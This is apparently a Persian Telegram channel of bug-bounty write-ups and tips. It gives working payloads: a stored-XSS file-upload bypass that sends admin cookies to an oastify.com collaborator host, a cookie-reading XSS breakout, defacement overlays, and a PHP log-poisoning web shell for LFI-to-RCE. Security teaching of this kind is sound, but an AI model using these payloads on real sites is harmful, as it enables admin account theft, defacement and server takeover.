دوستان همیشه شخصیت کاریتون براتون مهم باشه ، هیچ وقت پرخاشگری یا بی ادبانه صحبت نکنید.
چون اولن که توی ایرانیم میتونن خیلی راحت ازتون شکایت کنن و دومن هم برای آینده خودتون بده از یه جایی به بعد سایتا براتون تکراریه ، تریاژر ها تکراریه ، مدیریت ها تکراریه برا همین شما اگر رزومه خوبی نداشته باشید قطعا بد عذیت میشید پس به اعصاب خودتون مسلط باشید و سعی کنید همیشه موادبانه و حرفه ای برخورد کنید حتی اگر اخر بانتی بهتون تعلق نگیره
#تجربه #باگ_بانتی
چون اولن که توی ایرانیم میتونن خیلی راحت ازتون شکایت کنن و دومن هم برای آینده خودتون بده از یه جایی به بعد سایتا براتون تکراریه ، تریاژر ها تکراریه ، مدیریت ها تکراریه برا همین شما اگر رزومه خوبی نداشته باشید قطعا بد عذیت میشید پس به اعصاب خودتون مسلط باشید و سعی کنید همیشه موادبانه و حرفه ای برخورد کنید حتی اگر اخر بانتی بهتون تعلق نگیره
#تجربه #باگ_بانتی
❤4
Life and Learning🎭
🔎دوربین مداربسته! یکی از سخت افزار ها برای بینایی از راه دور که ازش استفاده میشه! 🤔چطور میشه بهش نفوذ کرد؟ قراره همینو بهتون بگیم! به چند روش؟🤥 از نظر من به 2 روش (اتک لوکال، اتک اکسترنال) ولی به صورت تکنیکی 11 تا تکنیک جدا کردم. تکنیک ها رو میتونی بگی؟…
یکی از تکنیک هایی که از طریق اون به دوربین ها دسترسی میگیرن از طریق وبسایت هایی هستش که لایو کمرا هارا پخش میکنن اینجا چند نمونه رو خدمتتون گفتم
سایت : https://www.earthcam.com/
سایت : http://www.insecam.org/
#دوربین_مداربسته | #امنیت
سایت : https://www.earthcam.com/
سایت : http://www.insecam.org/
#دوربین_مداربسته | #امنیت
Earthcam
EarthCam - Webcam Network
EarthCam is the leading network of live streaming webcams for tourism and entertainment around the world with 4K streaming technology.
تا حالا شنده بودین که یکی ادمین و منیجر رو تیک اور کنه؟
اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users
چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده
حالا چی هست اصلا؟ تیکه تیکه توی پست ها توضیح میدم !
#باگ_بانتی | #رایتاپ
اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users
چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده
حالا چی هست اصلا؟ تیکه تیکه توی پست ها توضیح میدم !
#باگ_بانتی | #رایتاپ
شما فکر کنید فلوی عادی سایت اینه که فایل HTML میخای اپلود کنی نمیزاره ولی PDF میزاره 🙂↔️
شاید بگین چرا با همون PDF باگ XSSنمیزنی باید بگم که چرا باید بین طلا و نقره برم و نقره رو قبول کنم؟ طلا بهتره ، پولش و درجه حساسیتش بالا تره
حالا این درخواستیه که توی اپلود تیکت بود و وقتی فایل HTML میذاشتیم اجاره اپلود نمیداد (با اینکه کد های HTML که زدم علنن یه قالب وبسایته کار نگیرین😂) بعد به ذهنم رسید که چطور اینو بایپس کنیم ؟
اینی که به فرمت HTML گیر میده ولی به کانتنت تایپ text/html نه ، و بادی درخواست هم چک میکنه که چی باشه !
چطور دورش بزنیم؟ آفرین با فرمت های دیگه ولی وقتی رفتم و فرمت shtml رو اپ کردم نشد و یهو به ذهنم خورد که یه متد بایپس وجود داره با مجیک بایت!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
و رفتم برا تست
#باگ_بانتی | #رایتاپ
شاید بگین چرا با همون PDF باگ XSSنمیزنی باید بگم که چرا باید بین طلا و نقره برم و نقره رو قبول کنم؟ طلا بهتره ، پولش و درجه حساسیتش بالا تره
حالا این درخواستیه که توی اپلود تیکت بود و وقتی فایل HTML میذاشتیم اجاره اپلود نمیداد (با اینکه کد های HTML که زدم علنن یه قالب وبسایته کار نگیرین😂) بعد به ذهنم رسید که چطور اینو بایپس کنیم ؟
اینی که به فرمت HTML گیر میده ولی به کانتنت تایپ text/html نه ، و بادی درخواست هم چک میکنه که چی باشه !
چطور دورش بزنیم؟ آفرین با فرمت های دیگه ولی وقتی رفتم و فرمت shtml رو اپ کردم نشد و یهو به ذهنم خورد که یه متد بایپس وجود داره با مجیک بایت!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
و رفتم برا تست
#باگ_بانتی | #رایتاپ
❤3
نشستم باهاش ور رفتم و داشتم پارامتر هارو تغییر میدادم که دیدم اینطوری بایپس شد
اسم فایل : test.shtml
کانتنت تایپ : text/html
بادی درخواست
و بومممممممم یه اکانت تیک اور ادمین خوشگل
#باگ_بانتی | #رایتاپ
اسم فایل : test.shtml
کانتنت تایپ : text/html
بادی درخواست
%PDF-1.3
<!DOCTYPE html>
<html lang="en">
<body>
<h1>Hello Admin Are You a humand?</h1>
<noscript>
function admin () {
var xhr = new XMLHttpRequest(); xhr.open("POST", "https://zmpcnszibh3k05hk0h185fxft6zxnnbc.oastify.com", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send(document.cookie);
}
</noscript>
<input type="checkbox" value="yes" onclick="admin()">
</body>
</html>
%%EOF
و بومممممممم یه اکانت تیک اور ادمین خوشگل
#باگ_بانتی | #رایتاپ
❤6
Life and Learning🎭
نشستم باهاش ور رفتم و داشتم پارامتر هارو تغییر میدادم که دیدم اینطوری بایپس شد اسم فایل : test.shtml کانتنت تایپ : text/html بادی درخواست %PDF-1.3 <!DOCTYPE html> <html lang="en"> <body> <h1>Hello Admin Are You a humand?</h1> <noscript> function admin () {…
شاید بپرسین چطور بایپس شده؟ ببینید فیچر فایل اپلود گفتم بادی درخواست رو چک میکنه و فایلPDF رو اجازه اپلود میده پس رفتم و درخواست اپلود PDF رو بررسی کردم و Magic Bytes فرمت Pdf رو گرفتم و گذشتم توی فایل HTMl و دیدم فیچر دور خورد (فیچر فکر میکرد که فایل اپلودی Pdf هستش بخاطر مجیک بایت) ولی در اصل فایل مخرب بود و اینطوری بود که یه باگ Critical ثبت شد
سناریو بالا که خدمتتون شرح دادم رو واقعیت روی سایتای ایرانی بیشتر دیدم ! و خیلی هم مرسومه (روی سایتایی زدم که توی حوزه خودشون حرفی برای گفتن دارن) پس تست کنید همیشه اگر بخوره واقعا باگ خفنی زدید!
خب دوستان اومدم با یه تجربه برگ ریزون دیگه از کار روی سایت ایرانی!
یه شرکتی روشون کار کردیم (بماندکه ادعا میکردن که ما خیلی امنیم) حدودا 5 تا باگ زدیم که از این 5 تا 3 تاش حیاتی بود 1 با سطح بسیار مهم و یکی هم مدیوم یا متوسط
آقا اینا سر مارو شیره مالیدن و کلا گفتن 20 تمن میدیم ( یه پیمنت پراسس زدم ازشون که قیمت خود اون 45 میلیون بود طبق تجربه بانتی های اخیر) بعد هیچی گفتیم باشه
گذشت و گذشت جنگ شد و اینا
بعد از جنگ گفتن آقا جنگه بزار دو تا قسط کنیم 20 میلیون رو دوتا 10 تمن بدیم
گفتیم باشه
بعد الان اومدن میگن به فکر اینیم که شرکت رو منحل کنیم و تعطیلش کنیم فعلا بیا 5 تمن بدیم بهتون تا ببینیم چطور میشه اوضاع 😐
روز به روز کار کردن روی وبسایت های ایرانی و توی ایران داره جالب تر و عجیب تر میشه
یعنی تو به یه هانتر خارجی بگی که من 5 تا باگ زدم از یه شرکت و بعد موقع بانتی دادن منحل شده شرکت به خدا اگر باورش شه 😑😑
آره دوستان باگ بزنید!
#تجربه
یه شرکتی روشون کار کردیم (بماندکه ادعا میکردن که ما خیلی امنیم) حدودا 5 تا باگ زدیم که از این 5 تا 3 تاش حیاتی بود 1 با سطح بسیار مهم و یکی هم مدیوم یا متوسط
آقا اینا سر مارو شیره مالیدن و کلا گفتن 20 تمن میدیم ( یه پیمنت پراسس زدم ازشون که قیمت خود اون 45 میلیون بود طبق تجربه بانتی های اخیر) بعد هیچی گفتیم باشه
گذشت و گذشت جنگ شد و اینا
بعد از جنگ گفتن آقا جنگه بزار دو تا قسط کنیم 20 میلیون رو دوتا 10 تمن بدیم
گفتیم باشه
بعد الان اومدن میگن به فکر اینیم که شرکت رو منحل کنیم و تعطیلش کنیم فعلا بیا 5 تمن بدیم بهتون تا ببینیم چطور میشه اوضاع 😐
روز به روز کار کردن روی وبسایت های ایرانی و توی ایران داره جالب تر و عجیب تر میشه
یعنی تو به یه هانتر خارجی بگی که من 5 تا باگ زدم از یه شرکت و بعد موقع بانتی دادن منحل شده شرکت به خدا اگر باورش شه 😑😑
آره دوستان باگ بزنید!
#تجربه
❤10
Life and Learning🎭
در آخرم وقتی اومد و ادمین دید این درخواست برای سرور من اومد! و اینجا اشک شوق داشتم میریختم (علکی)!
یه آسیب پذیری مشابه همین سطح حساسیت رو بهتون نشون میدم تا دقایقی دیگر!
❤3
Life and Learning🎭
تا حالا شنده بودین که یکی ادمین و منیجر رو تیک اور کنه؟ اره تایتلش اینه : Stored XSS Via Bypass File Upload Lead to Full Account Take Over Superlevel Users چطور حالا بهش میرسیم؟ من خودم چندین بار این آسیب پذیری رو زدم و تقریبا 80 درصدش توی تیکت ها بوده …
بعضی وقتا سایت یه سری اپشن داره که خیلی خاصن مثل قسمت تیکت ها ، چت با هم تیمی ، چت با سایر کاربران ، چت با ربات ، چت با هوش مصنوعی و .... که اگر آسیب پذیری در قسمت تیکت ها بزنی معمولا سطح خوبی میگیرن چون با ادمین ها هستش اکسپلویت شدنش ، یعنی مخرب بودنش بیشتر از تاثیر روی یه کاربر عادیه حالا یعنی چی؟ما توی تیکت ها میایم و یه سوال یا یه درخواستی رو مطرح میکنیم و میفرستیم برای ادمین مروبطه یا تحت شرایطی برای مدیریت و آنها این پیغام رو میبینند و در نهایت روی اون ریپلای میزنند و پاسخ درخور شمارو میدن!
حالا آسیب پذیریش کجاس؟ بیاین بهتون بگم
حالا آسیب پذیریش کجاس؟ بیاین بهتون بگم
👍6
در تیکت ها ما وقتی یه سوالی میپرسیم ، به یه حالت چت گونه ای پیغام ما توی صفحه HTML دیده میشه و در آنجا ذخیره میشه ! و همینطور هم از سمت ادمین هم همین اتفاق میوفته و پیغام ما برای ادمین نمایش داده میشه !
حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری
در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!
و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!
#باگ_بانتی | #رایتاپ
حالا اگر ما توی پیغاممون یه پیلود خطرناک که منجر به دزدیدن اکانت ادمین بشه بزاریم و بفرستیم چی میشه ؟ هیچ اکانت ادمین دستت میوفته و میتونی واردش بشی و سعی کنی سطح دسترسیت رو از طریق اپلود شل و .... بالا تر ببری
در اینجا منم همین کارو کردم اومدم بین پیغامم پیلود مخرب زدم که وقتی ادمین این پیام منو سین کرد سمتش یه اتفاقاتی بیوفته (که در این پیلود عمل خاصی اتفاق نمیوفته)
و و و حتی این پیلود من از سمت ادمین قابل رویت نیست ولی کار میکنه سمتش چرا؟ چون تگ اسکریپت مثل سایر تگ ها نیست که خروجیش دیده بشه و یا کدش دیده بشه برای همین دور از دید کاربر یا ادمین یا تارگت اعمال میشه!
و اینطوری ادمین رو تیک اور میکنن!!!!!!!!!!!!!
#باگ_بانتی | #رایتاپ
👏3👎1🤡1
خروجی کار هم به این صورت هستش که میتونید ببینید که پیغام به صورت عادی رفلکت شده
و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
#باگ_بانتی | #رایتاپ
و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
#باگ_بانتی | #رایتاپ
👍6
Life and Learning🎭
در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!
همچینم آسیب پذیری قدیمی نیست که بگی پیدا نمیشه فقط باید دستت بیاد چطور تستش کنی و کجا تستش کنی!!!!!!
#باگ_بانتی | #رایتاپ
#باگ_بانتی | #رایتاپ
🔥6
در بعضی از سایت ها باید بشینین و تحلیل کنید که چطور با XSS میتونید برسید همیشه با پیلود های ساده نمیتونید دست پیدا کنید مثل این پیلود که خیلی عجیب و البته هوشمندانه بود !
#باگ_بانتی | #رایتاپ
https://example.com/?q=testsec'})});alert(document.cookie);$(function () { app.product.filter.init({ noscript: '#باگ_بانتی | #رایتاپ
🔥4❤1
بعضی وقتا شما یه HTML Injection کشف میکنید که میخواید از طریقش صفحه دیفیسی رو ترتیب بدید ولی نمیتونید ! پیلود زیر رو اول وارد میکنید
ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!
#باگ_بانتی | #رایتاپ
<div style='position: fixed; top: 0; left: 0; width: 100%; height: 100%;
background-color: rgba(0, 0, 0, 0.8); z-index: 9999;
display: flex; justify-content: center; align-items: center;
color: white; font-size: 2em; font-family: sans-serif;'>
تست آسیب پذیری در وبسایت هدف
</div>
ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
<div class='position-fixed top-0 start-0 w-100 h-100 d-flex justify-content-center align-items-center bg-dark bg-opacity-75 text-white fs-2' style='z-index: 9999;'>
تست آسیبپذیری در وبسایت
</div>
و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!
#باگ_بانتی | #رایتاپ
❤6👍2😁1
تزریق لاگ سرور + LFI → RCE
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره میکند.
2️⃣ مهاجم کد PHP را تزریق میکند:
User-Agent: <?php system($_GET['cmd']); ?>
3️⃣ فایل لاگ در root ذخیره میشود: /logs/access.log
4️⃣ اگر آسیبپذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id
Nullsecurityx
#باگ_بانتی | #رایتآپ
❤6
پستی از استاد منصوری!
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
✨نشت توکن بازنشانی رمز عبور از طریق Referer
اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق میافته:
1. کاربر درخواست بازنشانی رمز عبور میکنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وبسایت میخواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیلتون (مثلاً v@mail.com) رو وارد میکنید و دکمه "ارسال" رو میزنید. وبسایت یه درخواست (POST) به سرورش میفرسته تا فرآیند بازنشانی شروع بشه.
2. وبسایت یه ایمیل با لینک بازنشانی میفرسته:
سرور وبسایت یه توکن (یه کد منحصربهفرد و موقت) تولید میکنه و یه لینک حاوی این توکن رو توی ایمیل براتون میفرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحهای ببره که بتونید رمز جدید وارد کنید.
3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک میکنید، مرورگرتون شما رو به صفحه بازنشانی رمز میبره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وبسایت دیگه (خارجی) بارگذاری میکنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وبسایت خارجی میفرسته.
🔅توی این درخواست، مرورگر بهطور خودکار آدرس صفحهای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer میفرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وبسایت خارجی نشت میکنه!
4. مهاجم به توکن دسترسی پیدا میکنه:
اگه اون وبسایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم میتونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم میتونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.
چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، میتونن حساب شما رو کنترل کنن.
#باگ_بانتی | #امنیت
👍3❤1